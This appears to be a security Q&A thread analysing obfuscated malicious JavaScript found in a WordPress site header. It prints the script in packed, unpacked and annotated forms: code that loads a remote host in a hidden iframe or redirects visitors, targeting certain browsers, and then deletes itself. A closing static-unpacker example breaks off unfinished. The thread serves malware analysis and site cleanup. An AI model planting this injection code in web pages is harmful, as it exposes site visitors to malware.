Suspicious JavaScript in website header

22

I'm not sure this is the right place to ask questions like this, so apologies if it isn't.

I found the following code in the header of one of my WordPress websites. I'm fairly sure it is malicious and I have removed it. However, I'm curious and can't work out what its purpose is.

Is anyone able to provide any ideas?

Base 64 Encoded:


Actual code:

<script type="text/javascript" id="id_8807906">
    eval(function(p, a, c, k, e, d) {
        e = function(c) {
            return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
        };
        if (!''.replace(/^/, String)) {
            while (c--) {
                d[e(c)] = k[c] || e(c)
            }
            k = [function(e) {
                return d[e]
            }];
            e = function() {
                return '\w+'
            };
            c = 1
        };
        while (c--) {
            if (k[c]) {
                p = p.replace(new RegExp('\b' + e(c) + '\b', 'g'), k[c])
            }
        }
        return p
    }('q 1t=3x(J(){f(j.M!=1I&&L j.M!="K"){3y(1t);f(L A["1A"]=="K"){A["1A"]=1;q 17=(16()&&1R());q 1T=!17&&!!A.3z&&A.E.3w==="3v 3r.";q 1j=-1;q G="3s://3t.3u/3A";f(W()&&1j==1){f((E.N.1o(/3B/i))||(E.N.1o(/3H/i))){19.3I(G)}z{A.19=G;j.19=G}}z{f((17&&!1T&&!W())){q S="<11 3J=\"3G:3F;3C:-3D;\"><1y 3E=\"1l\" 3q=\""+G+"\" 3p=\"1l\"></1y></11>";q I=j.3b("11");f(I.1m==0){j.M.P=j.M.P+S}z{q 1N=I.1m;q R=3c.3d((1N/2));I[R].P=I[R].P+S}}}}1M()}},3a);J 1M(){q U="39";f(U!="35"){q H=j.36(U);f(L H!=K&&H!=1I){H.37="";38 H}}};J 1R(){f(j.D&&!j.3e){x B}z f(j.D&&!A.3f){x B}z f(j.D&&!j.3m){x B}z f(j.D&&!j.3n){x B}z f(j.D&&!A.3o){x B}z f(j.D){x B}z f(L E.3l!="K"&&!j.D&&16()){x B}z{x 1b}}J 16(){q y=A.E.N;q Q=y.C("3k ");f(Q>0){x Z(y.Y(Q+5,y.C(".",Q)),10)}q 1k=y.C("3g/");f(1k>0){q 14=y.C("3h:");x Z(y.Y(14+3,y.C(".",14)),10)}q O=y.C("3i/");f(O>0){x Z(y.Y(O+5,y.C(".",O)),10)}x 1b}J W(){q 1a=A.E.N.3j();f(/(3K|3L\d+|4h).+1h|4i|4j\/|4g|4f|4b|4c|4d|34|4k|1u(4l|1d)|1r|4r|4s |4t|4q|4p|1h.+4m|4n|4o m(4a|48)i|3S( 1O)?|3T|p(3U|3R)\/|3Q|3M|3N|3O(4|6)0|3P|3V|1H\.(3W|43)|44|46|42 41|3X|3Y/i.1C(1a)||/3Z|4u|2K|2f|2a|50[1-6]i|28|1V|a 1P|1X|1w(1Q|1x|s\-)|1S(2b|2k)|1g(2m|1n|1v)|2n|2d(2e|V|2c)|2i|1f(2l|1c)|1Z(T|2o)|1W|1Y(2p|\-m|r |s )|2q|2g(1U|1p|2h)|1B(2j|22)|23(1w|29)|27(e|v)w|26|24\-(n|u)|25\/|33|2Q|2R\-|2P|2O|2L|2M\-|1v(2N|1E)|2Z|2V(1e|1p|2X)|2x|2y\-s|2z|2w|2v|1i(c|p)o|2s(12|\-d)|2u(49|1S)|2B(2H|2I)|1Q(2D|2E)|2C|2F([4-7]0|1O|1P|2G)|2A|2t(\-|1q)|1L u|2J|2W|2Y\-5|g\-15|1c(\.w|1d)|31(30|2U)|2r|2T|2S\-(m|p|t)|4e\-|4D(1G|1F)|6m( i|1u)|6n\-c|6o(c(\-| |1q|a|g|p|s|t)|6k)|6h(6i|6j)|i\-(20|1c|X)|6q|4v( |\-|\/)|6w|6x|6y|6v|6u|6r|6s|1r|6t(t|v)a|6g|6f|62|63|64|5Z( |\/)|5U|5V |5W\-|5X(c|k)|65(66|6c)|6d( g|\/(k|l|u)|50|54|\-[a-w])|68|69|6z\-w|72|73\/|X(T|74|71)|1z(F|21|1n)|m\-6Z|6W(6X|1D)|75(76|7c|1J)|7e|15(F|7d|1B|7b|1i|t(\-| |o|v)|77)|78(50|6U|v 
)|6T|6G|6H[0-2]|6I[2-3]|6F(0|2)|6E(0|2|5)|6B(0(0|1)|10)|6C((c|m)\-|6D|6J|6K|6Q|6R)|6S(6|i)|6O|6L|6M(6N|5T)|5S|4W|4X|4Y(a|d|t)|4U|4R(13|\-([1-8]|c))|4Z|51|1K(5a|5b)|5c\-2|59(1U|58|1s)|55|56|1G\-g|57\-a|4P(4C|12|21|32|60|\-[2-7]|i\-)|4x|4y|4z|4F|4G|4M(4N|4O)|4L\/|4K(4H|X|4I|4J|V|5d)|5e(F|h\-|1x|p\-)|5G\/|1s(c(\-|0|1)|47|1z|1E|1D)|5A\-|5B|5C(\-|m)|5I\-0|5J(45|5Q)|5R(1g|1f|5O|1e|5N)|5K(5L|V)|5M(F|h\-|v\-|v )|5y(F|5l)|5m(18|50)|5n(5k|10|18)|1F(5g|5h)|5i\-|5o\-|5p(i|m)|5v\-|t\-15|5x(1K|5u)|1J(70|m\-|5q|5r)|5s\-9|1H(\.b|1L|5z)|5P|5D|5E|4V|6e(6p|T)|6l(40|5[0-3]|\-v)|5t|5w|5f|5j(52|53|60|61|70|5H|5F|4w|4A|4B)|4E(\-| )|4Q|4T|4S(g |6P|79)|7a|6Y|6V|6A\-|67|6a|6b\-/i.1C(1a.5Y(0,4))){x B}x 1b}', 62, 449, '|||||||||||||||if||||document|||||||var|||||||return|zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY|else|window|true|indexOf|all|navigator|01|XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl|ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD|lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc|function|undefined|typeof|body|userAgent|REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF|innerHTML|TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH|mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy|DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt|te|vgZvyjCdzDWwBudHEktBnaagYYYbnZxB|ny|LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo|ma|substring|parseInt||div|||AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA|mo|JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo|CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym||location|pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE|false|go|od|it|ar|al|mobile|do|ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT|fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM|21px|length|ca|match|ll|_|iris|se|jxPogLroeXQvpXkmguljZoGSNnIQKQUt|ip|co|ac|oo|iframe|mc|v_bd66b32e1bc6ad91e01318e8278918f0|bi|test|ri|nd|ta|pt|up|null|ts|pl|g1|pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo|dl_name|os|wa|er|iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX|ai|nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh|ck|802s|attw|abac|au|as|||rd|bl|bw|c55|bumb|br|770s|az|4thp|ko|yw|an|ex|3gso|be|nq|aptu|lb|rn|ch|av|amoi|us|di|avan|haie|ds|fly|el|dmob|dica|dbte|dc|devi|fetc|em|esl8|ic|k0|ez|ze|l2|ul|g560|6590|cldc|cmd|mp|ch
tm|cell|ccwa|cdm|hd|hcit|un|da|gene|ng|gf|craw|ad|gr||capi|hiptop|none|getElementById|outerHTML|delete|id_8807906|100|getElementsByTagName|Math|floor|compatMode|XMLHttpRequest|Trident|rv|Edge|toLowerCase|MSIE|maxTouchPoints|querySelector|addEventListener|atob|height|src|Inc|http|miwkavoriwka|ml|Google|vendor|setInterval|clearInterval|chrome|052F|iPhone|left|2630px|width|absolute|position|iPod|replace|style|android|bb|pocket|psp|series|symbian|plucker|re|palm|phone|ixi|treo|browser|xda|xiino|1207||ce|windows|link|vodafone||wap||in||ob|compal|elaine|fennec|hei|blazer|blackberry|meego|avantgo|bada|iemobile|hone|firefox|netfront|opera|mmp|midp|kindle|lge|maemo|6310|iac|83|qtek|r380|r600|85|98|07|hi|w3c|raks|rim9|ge|mm|ms|sa|s55|ro|ve|zo|qc|webc|pg|wi|whit|pdxg|veri|owg1|p800|pan|phil||pire||||prox|psio|qa|rt|po|ay|uc|pn|va|sc|vulc|gt|lk|tcl|vx|00|mb|t2|t6|tdg|tel|m3|m5|tx|vm40|sh|tim|voda|to|sy|si|sgh|shar|sie|v400|v750|81|sdk|80|sk|sl|so|ft|sp|t5|b3|utst|id|sm|oran|wv|klon|kpt|kwc|kyo|substr|kgt|||jigs|kddi|keji|le|no|your|libw|lynx|zeto|zte|xi|lg|vi|jemu|jbro|hu|aw|tc|tp|vk|hp|hs|ht|rg|i230|inno|ipaq|ja|im1k|ikom|ibro|idea|ig01|m1|yas|n7|ne|on|n50|n30|mywa|n10|n20|tf|wf|o2im|op|ti|nzph|nc|wg|wt|nok|mwbp|p1|x700|me|rc|wonu|cr||xo|m3ga|m50|ui|mi|o8|zz|mt|nw|wmlb|de|oa|02|mmef'.split('|'), 0, {}))
    
asked by bf2mad 15.10.2015 - 14:52

4 answers

21

It looks like the "actual code" you posted was packed using link. When you unpack it, you get:

var jxPogLroeXQvpXkmguljZoGSNnIQKQUt=setInterval(function()
{
if(document.body!=null&&typeof document.body!="undefined")
    {
    clearInterval(jxPogLroeXQvpXkmguljZoGSNnIQKQUt);
    if(typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"]=="undefined")
        {
        window["v_bd66b32e1bc6ad91e01318e8278918f0"]=1;
        var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym=(JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()&&iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX());
        var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh=!CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!!window.chrome&&window.navigator.vendor==="Google Inc.";
        var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT=-1;
        var XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl="http://miwkavoriwka.ml/052F";
        if(LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()&&ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT==1)
            {
            if((navigator.userAgent.match(/iPhone/i))||(navigator.userAgent.match(/iPod/i)))
                {
                location.replace(XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl)
            }
            else
                {
                window.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl;
                document.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl
            }
        }
        else
            {


                if((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh&&!LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()))
                    {
                    var DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt="<div style=\"position:absolute;left:-2630px;\"><iframe width=\"21px\" src=\""+XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl+"\" height=\"21px\"></iframe></div>";
                    var lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc=document.getElementsByTagName("div");
                    if(lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length==0)
                        {
                        document.body.innerHTML=document.body.innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                    else
                        {
                        var dl_name=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length;
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy=Math.floor((dl_name/2));
                        lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                }
            }
        }
        pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    }
}
,100);
function pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    {
    var vgZvyjCdzDWwBudHEktBnaagYYYbnZxB="id_8807906";
    if(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB!="none")
        {
        var ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD=document.getElementById(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB);
        if(typeof ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=undefined&&ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=null)
            {
            ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD.outerHTML="";
            delete ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD
        }
    }
};
function iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX()
    {
    if(document.all&&!document.compatMode)
        {
        return true
    }
    else if(document.all&&!window.XMLHttpRequest)
        {
        return true
    }
    else if(document.all&&!document.querySelector)
        {
        return true
    }
    else if(document.all&&!document.addEventListener)
        {
        return true
    }
    else if(document.all&&!window.atob)
        {
        return true
    }
    else if(document.all)
        {
        return true
    }
    else if(typeof navigator.maxTouchPoints!="undefined"&&!document.all&&JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo())
        {
        return true
    }
    else
        {
        return false
    }
}
function JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()
    {
    var zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY=window.navigator.userAgent;
    var TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("MSIE ");
    if(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH)),10)
    }
    var fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Trident/");
    if(fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM>0)
        {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("rv:");
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA+3,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)),10)
    }
    var REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Edge/");
    if(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF)),10)
    }
    return false
}
function LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()
    {
    var pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE=window.navigator.userAgent.toLowerCase();
    if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g 
|nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE.substr(0,4)))
        {
        return true
    }
    return false
}

Which is still somewhat obfuscated by the use of "random" variable names. Still, you can see that the code is trying to redirect to:

hxxp://miwkavoriwka.ml/052F

Does anyone know what this site is for?

    
answered 15.10.2015 - 15:41
17

I deobfuscated the code a bit:

var interval = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(interval);
        // only do once per page load
        if (typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"] == "undefined") {
            window["v_bd66b32e1bc6ad91e01318e8278918f0"] = 1;
            // mobile ?
            var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym = (test_for_sepcific_user_agents() && some_capability_check());
            // android ?
            var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh = !CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT = -1;
            var payload_addr = "http://miwkavoriwka.ml/052F";
            // This branch is never used because -1 != 1
            if (is_mobile_phone() && ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(payload_addr)
                } else {
                    window.location = payload_addr;
                    document.location = payload_addr
                }
            } else {
                if ((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh && !is_mobile_phone())) {
                    var frame_div = "<div style=\"position:absolute;left:-2630px;\"><iframe width=\"21px\" src=\"" + payload_addr + "\" height=\"21px\"></iframe></div>";
                    var divs = document.getElementsByTagName("div");
                    if (divs.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + frame_div
                    } else {
                        var dl_name = divs.length;
                        // why ?
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy = Math.floor((dl_name / 2));
                        divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML = divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML + frame_div
                    }
                }
            }
        }
        remove_script()
    }
}, 100);

function remove_script() {
    // Remove the script (myself)
    var some_id = "id_8807906";
    if (some_id != "none") {
        var some_element = document.getElementById(some_id);
        if (typeof some_element != undefined && some_element != null) {
            some_element.outerHTML = "";
            delete some_element
        }
    }
};

// some capability check
// Possibly another mobile phone check?
function some_capability_check() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && test_for_sepcific_user_agents()) {
        return true
    } else {
        return false
    }
}

function test_for_sepcific_user_agents() {
    var user_agent = window.navigator.userAgent;
    var user_agent_msi_index = user_agent.indexOf("MSIE ");
    if (user_agent_msi_index > 0) {
        return parseInt(user_agent.substring(user_agent_msi_index + 5, user_agent.indexOf(".", user_agent_msi_index)), 10)
    }
    var user_agent_trident_index = user_agent.indexOf("Trident/");
    if (user_agent_trident_index > 0) {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA = user_agent.indexOf("rv:");
        return parseInt(user_agent.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA + 3, user_agent.indexOf(".", AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)), 10)
    }
    var user_agent_edge_index = user_agent.indexOf("Edge/");
    if (user_agent_edge_index > 0) {
        return parseInt(user_agent.substring(user_agent_edge_index + 5, user_agent.indexOf(".", user_agent_edge_index)), 10)
    }
    return false
}

function is_mobile_phone() {
    var user_agent = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(user_agent) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(user_agent.substr(0, 4))) {
        return true
    }
    return false
}

It loads h**p://miwkavoriwka.ml/052F (which is already on some blacklists, including FF's phishing and malware protection list) in an iframe, or redirects to that URL (depending on the browser).

Edit: After reading the code a bit more: the only browsers that seem to be targeted are those where these conditions are met:

  • User agents containing MSIE, Trident/ or Edge/
  • Not a mobile phone? (see the function is_mobile_phone)
  • Some capability check is true (see the function some_capability_check)
answered 15.10.2015 - 16:06
12

Thanks for all the great information and help!

I have since found out how the site was initially compromised. The site was using an old version of the Mailpoet / wysija-newsletters plugin (pre 2.6.7).

Using an exploit in this plugin, the attacker was able to upload malicious code, which was then used to further infect the site.

link

Ultimately, the security issue with Mailpoet / wysija-newsletters was used to upload a file named .zip into /wp-content/uploads/wysija/temp, then extract the zip file and install some obscure themes. The attached screenshot shows what happened when entering the plugin administration page after the zip had been deleted. It seems that every time you enter wp-admin the site gets reinfected.

The site has been restored from a clean version, fully updated, and the WordFence plugin is running.

    
answered 16.10.2015 - 14:01
6

Its apparent purpose is to infect wp-settings.php, then infect all of your pages and link to the malware through an iframe.

You can remove it by deleting wp_inc/upd.php, but that won't fix the threat vector unless that hole is plugged. However, the "main infection" itself may be in a different file, if the comments are correct. Again, removing this file won't help much if the threat vector is still there.

One person also suggested replacing eval with alert. Others have already deobfuscated other versions using the techniques described in this thread. Your code follows a very similar pattern.

    
answered 15.10.2015 - 15:39
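
The unpacking step the answers refer to (unpacking the packed code, or swapping eval for alert), done statically, as an added example that is not part of any answer: a Node.js script that rebuilds an `eval(function(p,a,c,k,e,d)` payload by dictionary lookup without executing anything, then lists defanged indicators. The sample, the host `malware.example` and the function names are constructed for illustration; it assumes the usual argument layout `'payload',radix,count,'w1|w2|...'.split('|')`.

```javascript
// Static unpacker for "eval(function(p,a,c,k,e,d){...}(...))" output: the payload is
// rebuilt by dictionary lookup only; nothing from the sample is ever evaluated.

// Token the packer gives dictionary index c (mirrors its e() helper, radix <= 62).
function encodeIndex(c, radix) {
  const digit = c % radix;
  const head = c < radix ? '' : encodeIndex(Math.floor(c / radix), radix);
  return head + (digit > 35 ? String.fromCharCode(digit + 29) : digit.toString(36));
}

// Read the quoted string literal that starts at src[start] (basic escapes only).
function readQuoted(src, start) {
  const quote = src[start];
  if (quote !== "'" && quote !== '"') throw new Error('expected a string literal');
  const simple = { n: '\n', r: '\r', t: '\t' };
  let value = '';
  for (let i = start + 1; i < src.length; i++) {
    const ch = src[i];
    if (ch === quote) return { value, end: i + 1 };
    if (ch === '\\') {
      const next = src[++i];
      value += next in simple ? simple[next] : next;
    } else {
      value += ch;
    }
  }
  throw new Error('unterminated string literal');
}

// Returns the unpacked source text, or null when no packer wrapper is present.
function unpack(source) {
  const sig = /eval\(\s*function\s*\(p,\s*a,\s*c,\s*k,\s*e,\s*[dr]\)/.exec(source);
  if (!sig) return null;
  const call = /\}\s*\(\s*(?=['"])/g;          // "}(" that opens the argument list
  call.lastIndex = sig.index;
  if (!call.exec(source)) throw new Error('packer call not found');
  const payload = readQuoted(source, call.lastIndex);
  const nums = /^\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*/.exec(source.slice(payload.end));
  if (!nums) throw new Error('radix/count not found');
  const radix = Number(nums[1]);
  if (radix < 2 || radix > 62) throw new Error('unsupported radix');
  const words = readQuoted(source, payload.end + nums[0].length).value.split('|');
  const count = Math.min(Number(nums[2]), words.length); // untrusted count: bound it
  const dict = new Map();                      // Map: a token like "constructor" is safe
  for (let i = 0; i < count; i++) {
    const token = encodeIndex(i, radix);
    dict.set(token, words[i] || token);        // empty entry: token stands for itself
  }
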